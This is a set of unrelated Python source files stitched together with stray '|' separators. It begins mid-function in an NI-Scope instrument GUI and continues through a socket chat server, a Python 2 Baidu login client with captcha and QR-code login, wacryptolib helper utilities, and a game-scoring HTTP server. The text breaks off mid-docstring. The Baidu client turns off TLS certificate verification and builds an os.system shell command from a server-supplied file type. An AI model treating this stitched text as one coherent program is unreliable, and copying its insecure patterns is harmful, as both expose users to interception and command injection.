                    inner_temp_dict["Mean"] = stat.mean
                    inner_temp_dict["StDev"] = stat.stdev
                    inner_temp_dict["Min"] = stat.min_val
                    inner_temp_dict["Max"] = stat.max_val
                    inner_temp_dict["Num in Stats"] = stat.num_in_stats
                    key = meas + "_" + stat.channel
                    temp_dict[key] = inner_temp_dict
            self.table = TableCanvas(self.table_frame, data=temp_dict, read_only=True)
            self.table.show()
        except Exception as e:
            self._set_message(str(e))

    def update_trigger(self):
        """Apply the trigger settings of whichever notebook tab is active."""
        self.session.trigger_modifier = niscope.enums.TriggerModifier.AUTO
        self.trigger_type = self.trigger_notebook.tab(self.trigger_notebook.select(), "text")
        try:
            if self.trigger_type == "Digital":
                self.session.configure_trigger_digital(self.digital_trigger_source.get(),
                    niscope.enums.TriggerSlope[self.digital_trigger_slope.get().upper()])
            elif self.trigger_type == "Edge":
                self.session.configure_trigger_edge(self.edge_trigger_source.get(),
                    float(self.curr_edge_trigger_level.get()),
                    niscope.enums.TriggerCoupling[self.edge_trigger_coupling.get().upper()],
                    niscope.enums.TriggerSlope[self.edge_trigger_slope.get().upper()])
            elif self.trigger_type == "Hysteresis":
                self.session.configure_trigger_hysteresis(self.hysteresis_trigger_source.get(),
                    float(self.curr_hysteresis_trigger_level.get()), float(self.curr_hysteresis.get()),
                    niscope.enums.TriggerCoupling[self.hysteresis_trigger_coupling.get().upper()],
                    niscope.enums.TriggerSlope[self.hysteresis_trigger_slope.get().upper()])
            elif self.trigger_type == "Immediate":
                self.session.configure_trigger_immediate()
            elif self.trigger_type == "Window":
                self.session.configure_trigger_window(self.window_trigger_source.get(),
                    float(self.curr_window_low_level.get()), float(self.curr_window_high_level.get()),
                    niscope.enums.TriggerWindowMode[self.window_mode.get().upper()],
                    niscope.enums.TriggerCoupling[self.window_trigger_coupling.get().upper()])
        except Exception as e:
            self._set_message(str(e))
        else:
            self._set_message("Successfully updated trigger settings!")
main = NIScopeSFP() |
import socket
from threading import Thread
# Chat-server endpoint and shared state (bound at import time).
host = 'localhost'
port = 8080
clients = {}    # client socket -> chosen display name
addresses = {}  # client socket -> peer (host, port)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, port))
def handle_clients(conn, address):
    """Per-client thread: ask for a name, register the client, then relay
    every message to the room until the client quits or disconnects.

    conn: the accepted client socket; address: its (host, port) peer.
    """
    name = conn.recv(1024).decode()
    welcome = "Welcome " + name + ". You can type #quit if you want to leave the chat room."
    conn.send(bytes(welcome, "utf8"))
    msg = name + " has recently joined the chat room."
    broadcast(bytes(msg, "utf8"))
    clients[conn] = name
    while True:
        msg = conn.recv(1024)
        # recv() returning b'' means the peer closed the connection.  The
        # original looped forever broadcasting empty messages in that
        # case; treat it like an explicit quit instead.
        if not msg or msg == bytes("#quit", "utf8"):
            if msg:
                # Only echo the quit marker to a still-connected peer.
                conn.send(bytes("#quit", "utf8"))
            conn.close()
            del clients[conn]
            broadcast(bytes(name + " has left the chat room.", "utf8"))
            break
        broadcast(msg, name + ":")
def accept_client_connections():
    """Accept-loop: greet every connecting client and hand it off to a thread."""
    while True:
        new_conn, new_addr = sock.accept()
        print(new_addr, " has connected")
        new_conn.send("Welcome to the Chat room, please type your name to continue".encode("utf8"))
        addresses[new_conn] = new_addr
        # One daemon-less worker thread per client.
        Thread(target=handle_clients, args=(new_conn, new_addr)).start()
def broadcast(msg, prefix=""):
    """Send *msg* (bytes) to every registered client.

    :param msg: payload as bytes
    :param prefix: optional text (e.g. "name:") prepended to the payload

    Iterates over a snapshot of the registry: handle_clients() deletes
    entries from `clients` while a client quits, and mutating a dict
    during iteration raises RuntimeError.
    """
    prefix_bytes = bytes(prefix, "utf8")  # hoisted out of the loop
    for client_conn in list(clients):
        client_conn.send(prefix_bytes + msg)
# sock.listen(1) # one request at one time
# print("The server is running and is listening to client requests.")
# conn, address = sock.accept()
# message = 'Hey there is something important for you!'
# conn.send(message.encode())
# conn.close()
# Entry point: start listening and run the accept loop in a worker thread,
# blocking the main thread on it until shutdown.
if __name__ == "__main__":
    sock.listen(5)
    print("The server is running and is listening to client requests.")
    t1 = Thread(target=accept_client_connections)
    t1.start()
    t1.join()
# -*- coding: utf8 -*-
__author__ = 'fangc'
import requests
import re
import platform, os
import cookielib
import json
import urllib
import time
import sys
requests.packages.urllib3.disable_warnings()
# todo:修改windows命令行下登录失败的问题,还未定位到问题原因
def get_tt():
    """Return the current Unix time in whole milliseconds, as a string."""
    millis = int(time.time() * 1000)
    return str(millis)
# Replace the module handle by a Session object so cookies persist across calls.
requests = requests.session()
# Persist cookies to disk (libwww-perl format) between program runs.
requests.cookies = cookielib.LWPCookieJar('cookies.txt')
try:
    requests.cookies.load(ignore_discard=True, ignore_expires=True)
    # print requests.cookies
except:
    print u"还未登录百度"
# Default HTTP headers mimicking a desktop Chrome browser.
HEADER = {
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "zh-CN,zh;q=0.8",
    "Connection": "keep-alive",
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36"
}
MAIN_URL = "http://tieba.baidu.com/"
# Base URL for fetching the login captcha image.
BAIDU_CAT_URL_MAIN = "http://passport.baidu.com/cgi-bin/genimage?"
class NetworkError(Exception):
    """Raised when an HTTP request to Baidu fails or returns an unexpected status."""
class Login2(object):
    """Log in to Baidu either with username/password or via QR-code scan.

    Session cookies are persisted through the module-level LWP cookie jar so
    later runs can skip authentication entirely.  Python-2 only code.
    """
    def __init__(self, username=None, password=None):
        # Credentials may be omitted when a valid cookie file already exists.
        self.username = username
        self.password = password
        self.URL_BAIDU_SIGN = 'http://tieba.baidu.com/sign/add'
    def login_choice(self):
        """
        Choose the login method interactively:
        1: username/password login. 2: QR-code scan login
        :return:
        """
        print(u"请选择登录方式:\n"
              u"1:帐号密码登录(不支持手机号登录).\n"
              u"2:手机百度扫描二维码登录.\n"
              u"请输入号码:")
        login_type = int(raw_input())
        if login_type == 1:
            print(u"请输入帐号:")
            self.username = raw_input()
            print(u"请输入密码:")
            self.password = raw_input()
            self.login()
        elif login_type == 2:
            self.login_qrcode()
        else:
            print(u"输入错误信息!程序将退出")
            sys.exit()
    def login(self):
        """
        Username/password login.
        :return: True on success, False when credentials are missing
        """
        if self.islogin():
            print u"已从cookie加载配置,登录成功!"
            return True
        if not (self.username and self.password):
            print u"从cookie文件加载配置失败,请提供用户名密码!"
            return False
        URL_BAIDU_TOKEN = 'https://passport.baidu.com/v2/api/?getapi&tpl=pp&apiver=v3&class=login'
        URL_BAIDU_LOGIN = 'https://passport.baidu.com/v2/api/?login'
        # Fetch the anti-CSRF login token first.
        tokenReturn = requests.get(URL_BAIDU_TOKEN, verify=False).content
        matchVal = re.search(u'"token" : "(?P<tokenVal>.*?)"', tokenReturn)
        self.tokenVal = matchVal.group('tokenVal')
        postData = {
            'username': self.username,
            'password': self.password,
            'u': 'https://passport.baidu.com/',
            'tpl': 'pp',
            'token': self.tokenVal,
            'staticpage': 'https://passport.baidu.com/static/passpc-account/html/v3Jump.html',
            'isPhone': 'false',
            'charset': 'UTF-8',
            'callback': 'parent.bd__pcbs__ra48vi'
        }
        params = urllib.urlencode(postData)
        # NOTE(review): this mutates the shared module-level HEADER dict, not a copy.
        header = HEADER
        header['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        header['Accept-Encoding'] = 'gzip,deflate,sdch'
        header['Accept-Language'] = 'zh-CN,zh;q=0.8'
        header[
            'User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36'
        header['Content-Type'] = 'application/x-www-form-urlencoded'
        r = requests.post(URL_BAIDU_LOGIN, data=params, headers=header, verify=False)
        # URL used later to request a fresh captcha if the login needs one.
        self.BAIDU_CHANGE_CAP = "https://passport.baidu.com/v2/?reggetcodestr&token=" + self.tokenVal + \
                                '&tpl=mn&apiver=v3&tt=' + get_tt() + '&fr=login'
        if int(r.status_code) != 200:
            raise NetworkError(), u'表单上传失败'
        if not self.islogin():
            # Login was rejected: retry once with a solved captcha.
            postData['verifycode'], postData['codestring'] = self.__download_captcha()
            params = urllib.urlencode(postData)
            r = requests.post(URL_BAIDU_LOGIN, data=params, headers=header, verify=False)
            if r.status_code == 200:
                requests.cookies.save(ignore_discard=True, ignore_expires=True)
            else:
                print(u"发生未知错误!")
        else:
            requests.cookies.save(ignore_discard=True, ignore_expires=True)
        print u"登录成功"
        return True
        # modified 2016-03-02
        # if self.islogin():
        #     print u"登录成功"
        #     return True
        # else:
        #     raise NetworkError(), u"Username or Password error! Please check!"
    def login_qrcode(self):
        """
        Log in to Baidu by scanning a QR code with the Baidu mobile app.
        :return: True or False
        """
        if self.islogin():
            print u"已从cookie加载配置,登录成功!"
            return True
        else:
            print u"请用手机百度扫描二维码登录!"
        global gid
        global bduss
        gid = self.create_gid()
        params = {
            "lp": "pc",
            "gid": gid,
            "apiver": "v3",
            "tt": get_tt(),
            "callback": "bd__cbs__zh5cgp",
        }
        BdQrUrl = "https://passport.baidu.com/v2/api/getqrcode"
        BdQrGetUrl = "http://passport.baidu.com/v2/api/qrcode?sign="
        headers = HEADER
        req = requests.get(url=BdQrUrl, params=params, headers=headers, allow_redirects=False, verify=False)
        if req.status_code != 200:
            raise NetworkError(), u"发生未知错误!"
        sign_id = re.findall('"sign":"([\w]*)"', req.text)[0]
        BdQrGetUrl += sign_id
        r = requests.get(url=BdQrGetUrl, headers=HEADER, verify=False)
        if int(r.status_code) != 200:
            raise NetworkError(), u"二维码请求失败!"
        # Save and display the QR-code image for the user to scan.
        image_name = u"qrcode." + r.headers['content-type'].split("/")[1]
        open(image_name, "wb").write(r.content)
        self.open_img(image_name)
        # Poll below until the code has been scanned on the phone.
        params = {
            "channel_id": sign_id,
            "tpl": "mn",
            "gid": gid,
            "apiver": "v3",
            "callback": "bd__cbs__j7a2vw",
            "tt": get_tt(),
        }
        BdQrExist = "https://passport.baidu.com/channel/unicast"
        status = 1
        while status == 1:
            try:
                # errno 0 means already scanned, errno 1 means not scanned yet
                text = requests.get(url=BdQrExist, params=params, headers=headers, allow_redirects=False,
                                    verify=False).content
                status = int(re.findall('"errno":([0-1]*)', text)[0])
                print u"请按手机的提示操作!"
            except Exception as e:
                print e
        # Now wait for the user to confirm login on the phone; this yields the "v" key needed for bduss.
        while status == 0:
            try:
                text = requests.get(url=BdQrExist, params=params, headers=headers, allow_redirects=False,
                                    verify=False).content
                v = re.findall(r'\\"v\\":\\"([\w]*)\\"', text)[0]
                print(u"获取关键参数V成功!")
                status = 1
            except Exception as e:
                print e
        # Finally exchange "v" for the bduss session cookie.
        params = {
            "u": "https://www.baidu.com/",
            "bduss": v,
            "tpl": "mn",
            "gid": gid,
            "apiver": "v3",
            "callback": "bd__cbs__551o7a",
            "tt": get_tt(),
        }
        BdLoginUrl = "https://passport.baidu.com/v2/api/bdusslogin"
        req = requests.get(url=BdLoginUrl, params=params, headers=headers, allow_redirects=False)
        if req.status_code == 200:
            requests.cookies.save(ignore_discard=True, ignore_expires=True)
            print(u"登录成功!")
            return True
        else:
            print u"未知错误!可能百度修改了接口!"
    def fetch(self, url):
        # Plain GET helper returning the raw response body (no redirects).
        r = requests.get(url, allow_redirects=False, verify=False).content
        return r
    def islogin(self):
        """
        Check whether the current session is already authenticated.
        :return: True or False
        """
        header = HEADER
        header['Accept-Encoding'] = 'gzip, deflate, sdch'
        header['Referer'] = 'https://www.baidu.com/'
        url = "http://i.baidu.com/"
        # A 302 redirect from i.baidu.com means "not logged in".
        r = requests.get(url, headers=header, allow_redirects=False, verify=False)
        status_code = int(r.status_code)
        if status_code == 302:
            return False
        elif status_code == 200:
            # ignore_discard: save even cookies set to be discarded.
            # ignore_expires: save even expired cookies. The file is overwritten if it already exists.
            requests.cookies.save(ignore_discard=True, ignore_expires=True)
            return True
        else:
            raise NetworkError, u'网络故障'
    def __change_cap_url(self):
        """
        Fetch the identifier string of a fresh login captcha.
        :return: the "verifyStr" captcha id, or None on non-200 status
        """
        r = requests.get(self.BAIDU_CHANGE_CAP, headers=HEADER, verify=False)
        status_code = int(r.status_code)
        # print r.content
        if status_code == 200:
            msg = json.loads(r.content)
            return msg["data"]["verifyStr"]
    def __download_captcha(self):
        """
        Download the captcha image and ask the user to solve it.
        :return: (verifycode, codestring) once validated
        """
        codeString = self.__change_cap_url()
        url = BAIDU_CAT_URL_MAIN + codeString
        r = requests.get(url, headers=HEADER, verify=False)
        if int(r.status_code) != 200:
            raise NetworkError(), u"验证码请求失败"
        image_name = u"verify." + r.headers['content-type'].split("/")[1]
        open(image_name, "wb").write(r.content)
        self.open_img(image_name)
        verifycode = raw_input(u"Please enter the captcha:")
        return self.__check_captcha(verifycode, codeString)
    def __check_captcha(self, verifycode, codeString):
        """
        Ask Baidu whether the captcha answer is correct; retry on failure.
        :param verifycode: the user's answer
        :param codeString: the captcha id it answers
        :return: (verifycode, codeString) when correct
        """
        check_url = "https://passport.baidu.com/v2/?checkvcode&token=" \
                    + self.tokenVal + "&tpl=mn&apiver=v3&tt=" + get_tt() + "&verifycode=" + verifycode + "&codestring=" + codeString + \
                    "&callback=bd__cbs__r4gm19"
        r = requests.get(check_url, headers=HEADER, verify=False)
        if "success" not in r.content:
            print u"验证输入错误,请重新输入!\n" \
                  u"或者帐号密码错误,请确认!"
            self.__download_captcha()
        else:
            return verifycode, codeString
    def postdata(self, url, param, headers):
        # POST helper returning the raw Response object.
        req = requests.post(url, data=param, headers=headers, verify=False)
        return req
    @staticmethod
    def create_gid():
        """
        Build a random GUID-like gid (8-4-4-4-12 hex groups, third group
        starting with '4'); required when requesting the bduss cookie.
        :return: upper-cased gid string
        """
        from random import random
        key = ''
        for i in xrange(7):
            key += hex(int(random() * 16))[2:]
        key += '-'
        for i in xrange(4):
            key += hex(int(random() * 16))[2:]
        key += '-4'
        for i in xrange(3):
            key += hex(int(random() * 16))[2:]
        key += '-'
        for i in xrange(4):
            key += hex(int(random() * 16))[2:]
        key += '-'
        for i in xrange(12):
            key += hex(int(random() * 16))[2:]
        return key.upper()
    @staticmethod
    def open_img(image_name):
        """
        Open a captcha or QR-code image with the platform's viewer.
        :param image_name: file name of the image in the working directory
        :return:
        """
        print u"正在调用外部程序渲染验证码...\n" \
              u"或者手动打开代码目录下'{}'文件查看并填写验证码!".format(image_name)
        if platform.system() == "Linux":
            print u"Command: xdg-open %s &" % image_name
            os.system("xdg-open %s &" % image_name)
        elif platform.system() == "Darwin":
            print u"Command: open %s &" % image_name
            os.system("open %s &" % image_name)
        elif platform.system() == "SunOS":
            os.system("open %s &" % image_name)
        elif platform.system() == "FreeBSD":
            os.system("open %s &" % image_name)
        elif platform.system() == "Unix":
            os.system("open %s &" % image_name)
        elif platform.system() == "OpenBSD":
            os.system("open %s &" % image_name)
        elif platform.system() == "NetBSD":
            os.system("open %s &" % image_name)
        elif platform.system() == "Windows":
            os.startfile(image_name)
        else:
            print u"我们无法探测你的作业系统,请自行打开验证码 %s 文件,并输入验证码:" % os.path.join(os.getcwd(), image_name)
import abc
import logging
import os
from contextlib import contextmanager
from datetime import datetime, timezone
from json import JSONDecodeError
from typing import List, Optional, Sequence, Union, BinaryIO
import multitimer
import schema
import uuid0
from bson.binary import UuidRepresentation
from bson.json_util import dumps, loads, JSONOptions, JSONMode
from decorator import decorator
from schema import SchemaError, Schema
from wacryptolib import _crypto_backend
from wacryptolib.exceptions import SchemaValidationError
logger = logging.getLogger(__name__)
UTF8_ENCODING = "utf8"
WACRYPTOLIB_JSON_OPTIONS = JSONOptions(
json_mode=JSONMode.CANONICAL, # Preserve all type information
uuid_representation=UuidRepresentation.STANDARD, # Same as PythonLegacy
tz_aware=True, # All our serialized dates are UTC, not NAIVE
)
### Private utilities ###
def get_utc_now_date():
    """Return the current moment as a timezone-aware UTC datetime."""
    return datetime.now(timezone.utc)
def is_datetime_tz_aware(dt):
    """Return True when *dt* carries timezone information, else False."""
    offset = dt.utcoffset()
    return offset is not None
def check_datetime_is_tz_aware(dt):
    """Raise ValueError when *dt* is naive regarding timezones."""
    if is_datetime_tz_aware(dt):
        return
    raise ValueError("Naive datetime was encountered: %s" % dt)
@decorator
def synchronized(func, self, *args, **kwargs):
    """
    Wraps the function call with a mutex locking on the expected "self._lock" mutex.
    """
    # The `decorator` package preserves the wrapped function's signature;
    # the decorated object must expose a `_lock` context-manager attribute.
    with self._lock:
        return func(self, *args, **kwargs)
@contextmanager
def catch_and_log_exception(context_message):
    """Logs and stops any exception in the managed code block or the decorated function.

    :param context_message: short label identifying the guarded block in log output
    """
    assert isinstance(context_message, str), context_message
    try:
        yield
    except Exception as exc:
        # Deliberate broad catch: this is a top-level "never crash" boundary.
        logger.critical("Abnormal exception caught in %s: %r", context_message, exc, exc_info=True)
def get_memory_rss_bytes():
    """Return the resident-set size (RSS) of the current process, in bytes."""
    import psutil  # local import: psutil is an optional dependency

    current_process = psutil.Process(os.getpid())
    return current_process.memory_info().rss
def delete_filesystem_node_for_stream(stream: BinaryIO):
    """Remove the file backing *stream*, if the stream exposes one that exists."""
    target = getattr(stream, "name", None)
    if not target:
        return  # In-memory stream (e.g. BytesIO): nothing on disk to delete
    if os.path.exists(target):  # Can't be false on Win32, since files are not deletable when open
        os.remove(target)  # We let errors flow here!
### Public utilities ###
#: Hash algorithms authorized for use with `hash_message()`
SUPPORTED_HASH_ALGOS = ["SHA256", "SHA512", "SHA3_256", "SHA3_512"]
def hash_message(message: bytes, hash_algo: str):
    """Hash a message with the selected hash algorithm, and return the hash as bytes.

    :raises ValueError: when *hash_algo* is not one of SUPPORTED_HASH_ALGOS
    """
    if hash_algo not in SUPPORTED_HASH_ALGOS:
        raise ValueError("Unsupported hash algorithm %r" % hash_algo)
    digest_maker = _crypto_backend.get_hasher_instance(hash_algo)
    digest_maker.update(message)
    result = digest_maker.digest()
    # Every supported algo yields a 256- to 512-bit digest.
    assert 32 <= len(result) <= 64, len(result)
    return result
def consume_bytes_as_chunks(data: Union[bytes, BinaryIO], chunk_size: int):
    """Yield successive chunks of at most *chunk_size* bytes from *data*.

    *data* may be a bytes-like object or a binary stream; in the stream case
    the stream is closed and its backing filesystem node deleted once drained.
    """
    if not hasattr(data, "read"):
        # Plain object with a len(): slice it directly.
        for offset in range(0, len(data), chunk_size):
            yield data[offset : offset + chunk_size]  # TODO use memoryview to optimize?
        return
    # File-like BinaryIO object: drain it chunk by chunk.
    while True:
        piece = data.read(chunk_size)
        if not piece:
            break
        yield piece
    data.close()
    delete_filesystem_node_for_stream(data)
def split_as_chunks(
    bytestring: bytes, *, chunk_size: int, must_pad: bool, accept_incomplete_chunk: bool = False
) -> List[bytes]:
    """Split a `bytestring` into chunks (or blocks).

    :param bytestring: element to be split into chunks
    :param chunk_size: size of a chunk in bytes
    :param must_pad: whether the bytestring must be padded first or not
    :param accept_incomplete_chunk: do not raise error if a chunk with a length != chunk_size is obtained
    :raises ValueError: when the length is no multiple of chunk_size and neither
        padding nor incomplete chunks are allowed
    :return: list of bytes chunks
    """
    assert chunk_size > 0, chunk_size
    if must_pad:
        bytestring = _crypto_backend.pad_bytes(bytestring, block_size=chunk_size)
    if len(bytestring) % chunk_size and not accept_incomplete_chunk:
        raise ValueError("If no padding occurs, bytestring must have a size multiple of chunk_size")
    # Slice in a single comprehension; the last chunk may be short.
    return [bytestring[start : start + chunk_size] for start in range(0, len(bytestring), chunk_size)]
def recombine_chunks(chunks: Sequence[bytes], *, chunk_size: int, must_unpad: bool) -> bytes:
    """Recombine chunks which were previously separated.

    :param chunks: sequence of bytestring parts
    :param chunk_size: size of a chunk in bytes (only used for error checking, when unpadding occurs)
    :param must_unpad: whether the bytestring must be unpadded after recombining, or not
    :return: initial bytestring
    """
    recombined = b"".join(chunks)
    if not must_unpad:
        return recombined
    return _crypto_backend.unpad_bytes(recombined, block_size=chunk_size)
def dump_to_json_str(data, **extra_options):
    """
    Dump a data tree to a json representation as string.
    Supports advanced types like bytes, uuids, dates...
    """
    # Keys are sorted by default so the output is deterministic/canonical.
    sort_keys = extra_options.pop("sort_keys", True)
    return dumps(data, sort_keys=sort_keys, json_options=WACRYPTOLIB_JSON_OPTIONS, **extra_options)
def load_from_json_str(data, **extra_options):
    """
    Load a data tree from a json representation as string.
    Supports advanced types like bytes, uuids, dates...

    :raises SchemaValidationError: on malformed JSON input
    """
    assert isinstance(data, str), data
    try:
        result = loads(data, json_options=WACRYPTOLIB_JSON_OPTIONS, **extra_options)
    except JSONDecodeError as exc:
        raise SchemaValidationError("Invalid JSON string: %r" % exc) from exc
    return result
def dump_to_json_bytes(data, **extra_options):
    """
    Same as `dump_to_json_str`, but returns UTF8-encoded bytes.
    """
    return dump_to_json_str(data, **extra_options).encode(UTF8_ENCODING)
def load_from_json_bytes(data, **extra_options):
    """
    Same as `load_from_json_str`, but takes UTF8-encoded bytes as input.
    """
    decoded = data.decode(UTF8_ENCODING)
    return load_from_json_str(data=decoded, **extra_options)
def dump_to_json_file(filepath, data, **extra_options):
    """
    Same as `dump_to_json_bytes`, but writes data to filesystem (and returns bytes too).
    """
    serialized = dump_to_json_bytes(data, **extra_options)
    with open(filepath, "wb") as output_file:
        output_file.write(serialized)
    return serialized
def load_from_json_file(filepath, **extra_options):
    """
    Same as `load_from_json_bytes`, but reads data from filesystem.
    """
    with open(filepath, "rb") as input_file:
        raw_bytes = input_file.read()
    return load_from_json_bytes(raw_bytes, **extra_options)
def generate_uuid0(ts: Optional[float] = None):
    """
    Generate a random UUID partly based on Unix timestamp (not part of official "variants").

    Uses 6 bytes to encode the time and does not encode any version bits, leaving 10 bytes (80 bits) of random data.

    When just transmitting these UUIDs around, the stdlib "uuid" module does the job fine, no need for uuid0 lib.

    :param ts: optional timestamp to use instead of current time (if not falsey)
    :return: uuid0 object (subclass of UUID)
    """
    # Thin wrapper so callers depend on this module, not on the uuid0 package directly.
    return uuid0.generate(ts)
def gather_data_as_blocks(first_data: bytes, second_data: bytes, block_size: int):
    """PRIVATE API

    Concatenate two bytestrings and split the result into a block-aligned
    payload (the largest multiple of *block_size*) plus a remainder.

    :return: memory view of formatted data and remainder
    """
    assert block_size > 0, block_size
    combined = first_data + second_data
    aligned_size = len(combined) - (len(combined) % block_size)
    return memoryview(combined[:aligned_size]), combined[aligned_size:]
class TaskRunnerStateMachineBase(abc.ABC):
    """
    State machine for all sensors/players, checking that the order of start/stop/join
    operations is correct.

    The two-steps shutdown (`stop()`, and later `join()`) allows caller to
    efficiently and safely stop numerous runners.
    """
    def __init__(self, **kwargs):  # Exceeding kwargs are deliberately ignored
        self._runner_is_started = False
    @property
    def is_running(self):
        """Whether start() has been called without a matching stop()."""
        return self._runner_is_started
    def start(self):
        """Start the periodic system which will poll or push the value."""
        if self.is_running:
            raise RuntimeError("Can't start an already started runner")
        self._runner_is_started = True
    def stop(self):
        """Request the periodic system to stop as soon as possible."""
        if not self.is_running:
            raise RuntimeError("Can't stop an already stopped runner")
        self._runner_is_started = False
    def join(self):
        """
        Wait for the periodic system to really finish running.
        Does nothing if periodic system is already stopped.
        """
        if self.is_running:
            raise RuntimeError("Can't join an in-progress runner")
class PeriodicTaskHandler(TaskRunnerStateMachineBase):
    """
    This class runs a task at a specified interval, with start/stop/join controls.

    If `task_func` argument is not provided, then `_offloaded_run_task()` must be overridden by subclass.
    """
    from multitimer import RepeatingTimer as _RepeatingTimer
    # TODO make PR upstream to ensure that multitimer is a DAEMON thread!
    assert hasattr(_RepeatingTimer, "daemon")
    _RepeatingTimer.daemon = True  # Do not prevent process shutdown if we forgot to stop...
    _task_func = None  # Might be overridden as a method too!
    def __init__(self, interval_s, count=-1, runonstart=True, task_func=None, **kwargs):
        # interval_s: seconds between runs; count: max number of runs (-1 = unlimited);
        # runonstart: also fire once immediately when start() is called.
        super().__init__(**kwargs)
        self._interval_s = interval_s
        if task_func:  # Important
            self._task_func = task_func
        self._multitimer = multitimer.MultiTimer(
            interval=interval_s, function=self._private_launch_offloaded_run_task, count=count, runonstart=runonstart
        )
    def _private_launch_offloaded_run_task(self):
        """Wrapper to ensure that offloaded task will not be run if
        state machine has just been stopped concurrently"""
        if not self.is_running:  # pragma: no cover
            return  # In case of race condition (too hard to test)...
        return self._offloaded_run_task()
    def _offloaded_run_task(self):
        """Method which will be run periodically by background thread,
        and which by default simply calls task_func() and returns the result.
        MEANT TO BE OVERRIDDEN BY SUBCLASS
        """
        return self._task_func()
    def start(self):
        """Launch the secondary thread for periodic task execution."""
        super().start()
        self._multitimer.start()
    def stop(self):
        """Request the secondary thread to stop. If it's currently processing data,
        it will not stop immediately, and another offloaded operation might happen."""
        super().stop()
        self._multitimer.stop()
    def join(self):  # TODO - add a join timeout everywhere?
        """
        Wait for the secondary thread to really exit, after `stop()` was called.
        When this function returns, no more offloaded operation will happen,
        until the next `start()`.
        """
        super().join()
        # Reaches into multitimer internals: the underlying timer thread must
        # already have been signalled to stop before we block on its join().
        timer_thread = self._multitimer._timer
        if timer_thread:
            assert timer_thread.stopevent.is_set()
            timer_thread.join()
# Validation-related utilities
def validate_data_against_schema(data_tree, schema: Schema):
    """
    Validate data against provided python-schema, and raise SchemaValidationError if problems occur.
    """
    # NOTE: the `schema` parameter intentionally shadows the module-level
    # `schema` import within this function body.
    try:
        schema.validate(data_tree)
    except SchemaError as exc:
        raise SchemaValidationError("Error validating data tree with python-schema: {}".format(exc)) from exc
def convert_native_tree_to_extended_json_tree(data):  # FIXME push to docs?
    """
    Turn a native python tree (including UUIDs, bytes etc.) into its representation
    as Pymongo extended json (with nested $binary, $numberInt etc.)
    """
    import json

    # Round-trip through a string: advanced types are serialized to their
    # extended-json dict form, then parsed back as plain standard JSON.
    extended_json_str = dump_to_json_str(data)
    return json.loads(extended_json_str)
def get_validation_micro_schemas(extended_json_format=False):  # FIXME push to docs?
    """
    Get python-schema compatible microschemas for basic types,
    for their python or extended-json representations.

    :param extended_json_format: when True, return schemas matching the pymongo
        extended-json dict representation instead of native python types
    """
    import uuid
    # Native-python defaults:
    micro_schema_uid = uuid.UUID  # BASE CLASS, not uuid0's subclass
    micro_schema_binary = bytes
    micro_schema_int = int
    if extended_json_format:
        # Extended json stores ints as decimal strings and binary as base64 dicts.
        _micro_schema_integer = schema.And(str, schema.Regex(r"^[+-]?\d+$"))
        _micro_schema_base64 = schema.And(
            str, schema.Regex(r"^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4})$")
        )
        micro_schema_uid = {
            "$binary": {"base64": _micro_schema_base64, "subType": schema.Or("03", "04")}
        }  # Type 04 is the future!
        micro_schema_binary = {"$binary": {"base64": _micro_schema_base64, "subType": "00"}}
        micro_schema_int = schema.Or({"$numberInt": _micro_schema_integer}, {"$numberLong": _micro_schema_integer})
    # Simple namespace bundling the three micro-schemas.
    class MicroSchemas:
        schema_uid = micro_schema_uid
        schema_binary = micro_schema_binary
        schema_int = micro_schema_int
    return MicroSchemas
|
from http.server import BaseHTTPRequestHandler,HTTPServer
from operator import itemgetter
import json, os, time
PORT_NUMBER = 8013
# Playable board sizes mapped to the mandatory (start, end) cells of the chain.
FIELDS_INFO = {
    (6, 6): ((3, 3), (4, 5)),
    (7, 7): ((3, 3), (4, 6)),
    (8, 8): ((3, 3), (4, 6)),
    (10, 10): ((3, 3), (4, 6)),
}
# max count of saved result
DB_SIZE = 100
class SecurityError(Exception):
    """Raised when a submitted chain fails server-side validation (cheating attempt).

    The reason is kept in `message` (used by the HTTP handler) and is also
    passed to the Exception base class, so str(exc) now reports it too —
    previously Exception.__init__ was never called and str(exc) was empty.
    """

    def __init__(self, message):
        super().__init__(message)
        self.message = message
def process(data: str) -> tuple:
    """Parse a submitted JSON payload into (name, (line, xs, ys)).

    Returns ("", None) when the name is empty/too long or no points were sent.
    """
    payload = json.loads(data)
    raw_points = payload["points"]
    player = payload["name"]
    if player == "" or len(player) > 100 or raw_points is None:
        return ("", None)
    chain = [(point[0], point[1]) for point in raw_points]
    xs = [point[0] for point in raw_points]
    ys = [point[1] for point in raw_points]
    return (player, (chain, xs, ys))
def cross_product(a: tuple, b: tuple) -> int:
    """Return the z-component of the 2-D cross product a × b.

    Positive when *b* lies counter-clockwise from *a*, zero when collinear.
    (Return annotation fixed: the result is a scalar, not a tuple.)
    """
    return a[0] * b[1] - a[1] * b[0]
def intersect(segment1: tuple, segment2: tuple) -> bool:
    """Return True when the two closed segments properly cross each other.

    Fully collinear configurations (both orientation products zero) are
    deliberately reported as non-intersecting.
    """
    (x1, y1), (x2, y2) = segment1
    (x3, y3), (x4, y4) = segment2
    dir1 = (x2 - x1, y2 - y1)
    dir2 = (x4 - x3, y4 - y3)
    # Each product is <= 0 when the opposite segment's endpoints lie on
    # different sides (or on the line) of this segment.
    side_a = cross_product(dir1, (x3 - x1, y3 - y1)) * cross_product(dir1, (x4 - x1, y4 - y1))
    side_b = cross_product(dir2, (x1 - x3, y1 - y3)) * cross_product(dir2, (x2 - x3, y2 - y3))
    if side_a <= 0 and side_b <= 0:
        return not (side_a == 0 and side_b == 0)
    return False
def verify_and_calc(data: tuple, field_size: tuple, ends: tuple) -> int:
    """Validate a submitted knight-move chain and return its score.

    :param data: (line, x, y) triple as produced by process()
    :param field_size: (width, height) of the board
    :param ends: required (start, end) cells, from FIELDS_INFO
    :raises SecurityError: on any rule violation (empty chain, repeated points,
